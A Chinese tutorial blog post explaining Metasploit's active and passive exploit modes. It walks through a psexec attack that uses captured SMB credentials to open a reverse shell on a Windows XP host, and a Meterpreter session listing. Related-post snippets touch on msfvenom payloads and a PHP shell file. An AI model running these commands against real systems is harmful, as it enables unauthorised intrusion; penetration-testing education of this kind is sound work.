安科网

Metasploit 使用Exploits(漏洞)

Sabrina

Sabrina

2019-12-31

关注 关注

主动漏洞利用

主动漏洞将利用特定的主机,运行直至完成,然后退出。

  • “Brute-force(暴力)”模块将在受害者打开外壳时退出。
  • 如果遇到错误,模块执行将停止。
  • 您可以通过将‘-j‘传递给exploit命令来强制活动模块进入后台:
    msf exploit(ms08_067_netapi) > exploit -j
[*] Exploit running as background job 0.
msf exploit(ms08_067_netapi) >

    例子:

    以下示例利用先前获取的一组凭据来利用并获得目标系统上的反向shell。

    msf > use exploit/windows/smb/psexec
msf exploit(psexec) > set RHOST 192.168.1.100
RHOST => 192.168.1.100
msf exploit(psexec) > set PAYLOAD windows/shell/reverse_tcp
PAYLOAD => windows/shell/reverse_tcp
msf exploit(psexec) > set LHOST 192.168.1.5
LHOST => 192.168.1.5
msf exploit(psexec) > set LPORT 4444
LPORT => 4444
msf exploit(psexec) > set SMBUSER victim
SMBUSER => victim
msf exploit(psexec) > set SMBPASS s3cr3t
SMBPASS => s3cr3t
msf exploit(psexec) > exploit

[*] Connecting to the server...
[*] Started reverse handler
[*] Authenticating as user ‘victim‘...
[*] Uploading payload...
[*] Created \hikmEeEM.exe...
[*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.1.100[\svcctl] ...
[*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.1.100[\svcctl] ...
[*] Obtaining a service manager handle...
[*] Creating a new service (ciWyCVEp - "MXAVZsCqfRtZwScLdexnD")...
[*] Closing service handle...
[*] Opening service...
[*] Starting the service...
[*] Removing the service...
[*] Closing service handle...
[*] Deleting \hikmEeEM.exe...
[*] Sending stage (240 bytes)
[*] Command shell session 1 opened (192.168.1.5:4444 -> 192.168.1.100:1073)

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

被动漏洞利用

  • 被动攻击等待传入主机并在连接时利用它们。
  • 被动攻击几乎总是集中在诸如Web浏览器,FTP客户端等客户端上。
  • 它们也可以与电子邮件漏洞利用一起使用,等待连接。
  • 被动攻击报告shell可以通过将‘-l‘传递给sessions命令来枚举。传递‘-i‘将与shell进行交互。
msf exploit(ani_loadimage_chunksize) > sessions -l

Active sessions
===============

  Id  Description  Tunnel
  --  -----------  ------
  1   Meterpreter  192.168.1.5:52647 -> 192.168.1.100:4444

msf exploit(ani_loadimage_chunksize) > sessions -i 1
[*] Starting interaction with 1...

meterpreter >

msf shell metasploit 漏洞 payload psexec

Sabrina

Sabrina

0 关注 0 粉丝 0 动态

关注 关注

相关推荐

metasploit与Cobaltstrike互相派生shell

  msf exploit > set LHOST 192.168.229.143. 之后使用Cobalt Strike创建一个。其中ip为msf的ip地址,端口为msf所监听的端口。然后选中计算机,右键->Spawn,选择刚刚创建的监听器:。

Yyqingmofeige 2020-02-23

Python实现远程调用MetaSploit的方法

本文较为详细的讲述了Python实现远程调用MetaSploit的方法,对Python的学习来说有很好的参考价值。安装Python的msgpack类库,MSF官方文档中的数据序列化标准就是参照msgpack。grant all privileges on

Pythonandme 2019-04-16

Metasploit用法大全

Metasploit功能程序msfvenom集成了载荷生成器、载荷编码器、空指令生成器的功能查看详细指令选项:msfvenom-h. 令牌假冒 令牌假冒是Meterpreter最强大的功能之一,对渗透测试非常有帮助。示例场景:你正在对某个组织进行渗透测试,

安在信息安全新媒体 2018-01-24

2019-2020-2 20175326 李一潇《网络对抗技术》Exp6 MSF基础应用

在本次实验中,大部分的同学采用的是ms漏洞,ms是代表微软的漏洞,如ms08-067 那么08是代表2008年微软出的漏洞,067是代表08年第67个漏洞;它是一个漏洞字典,有MITRE维护。这里采用的是cve_2019_0708漏洞,2019年5月14日

shayuchaor 2020-05-01

2019-2020-2 网络对抗技术 20175230滕星 Exp6 MSF基础应用

MS08-067漏洞的全称为“Windows Server服务RPC请求缓冲区溢出漏洞”,如果用户在受影响的系统上收到特制的 RPC 请求,则该漏洞可能允许远程执行代码。在Windows 2000、Windows XP 和 Windows Server 2

付春杰Blog 2020-04-30

20174302 王漫天 《网络对抗技术》Exp6 MSF基础应用

MSF基础应用 ,掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。MS08-067 MS08-067漏洞的全称为“Windows Server服务RPC请求缓冲区溢出漏洞”,如果用户在受影响的系统上收到特制的 RPC 请求,则该漏洞可

ZMichael 2020-04-25

msf生成各个平台payload

cat shell.php | pbcopy && echo ‘<?php ‘ | tr -d ‘\n‘ > shell.php && pbpaste >> shell.php

伏雌摘星阁 2020-02-26

cs配合msf批量探测内网MS17-010漏洞

run autoroute -s 100.0.0.0/8 # 添加路由。一般来说,在meterpreter中设置路由便可以达到通往其内网的目的。然而有些时候还是会失败,这时我们可以background返回msf>,查看下外面的路由情况。msf&

点滴技术生活 2019-10-25

MSF入侵安卓手机 MSF又是什么

MSF是Metasploit的简称,Metasploit是一款开源的安全漏洞检测工具,非常强大,分别有Windows版和Linux版,工具里集成了许多微软公布的漏洞。我这里做测试的系统是Backbox linux ,这是一款网络渗透,信息安全评估系统。里边

fengyeezju 2015-12-16

处理微软MSF同步框架中的数据冲突

首先,我们需要理解什么是数据冲突,它是怎么产生的。图1显示了最常见的数据冲突,当两个源同时更新一行数据时的情况。象这样的例子在应用程序逻辑中也存在,MSF提供了两个不同的方法来定义这个逻辑。

其实我是一演员 2009-04-29

LOL-S7:兮夜妖姬七进七出!WE轻松吊打MSF拿下小组赛首胜!

北京时间10月6日,S7英雄联盟世界赛小组赛第二天的比赛,LPL三号种子WE对战MSF。最终WE只用了26分钟就轻松的拿下了MSF拿到了自己小组赛的首胜。这局比赛WE拿到了一个前中期进攻的阵容,打野拿到了皇子,中路则拿到了兮夜擅长的妖姬。MSF这边则拿出了

中国电竞幕后史 2017-10-06
Sabrina

Sabrina

W3CSchool教程
HTML 教程
CSS 教程
Bootstrap 教程
Javascript 教程
jQuery 教程
后端教程
C 教程
Java 教程
PHP 教程
Python 教程
Go 教程
移动开发
Android 教程
Swift 教程
Kotlin 教程
jQuery Mobile 教程
ionic 教程
关于我们
新闻动态
联系方式
招聘英才
安科实验室
帮助与反馈

安科网(Ancii),中国第一极客网

Copyright © 2013 - 2019 Ancii.com

京ICP备18063983号 京公网安备11010802014868号